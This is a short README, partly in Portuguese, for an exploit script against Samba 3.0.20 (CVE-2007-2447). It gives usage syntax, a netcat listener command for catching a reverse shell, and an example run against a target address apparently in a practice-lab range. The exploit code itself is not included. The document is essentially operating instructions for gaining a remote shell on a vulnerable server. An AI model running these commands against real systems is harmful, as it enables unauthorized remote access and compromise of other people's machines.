
Samba 3.0.20 Exploit CVE-2007-2447
Samba 3.0.20 CVE-2007-2447 Exploit
python3 smb3.0.20_exp.py -lh [localhost] -lp [local port] -t [target]
Crie um listener Netcat
nc -nlvp 4444
Execute o script
python3 smb3.0.20_exp.py -lh 10.10.16.18 -lp 4444 -t 10.10.10.3
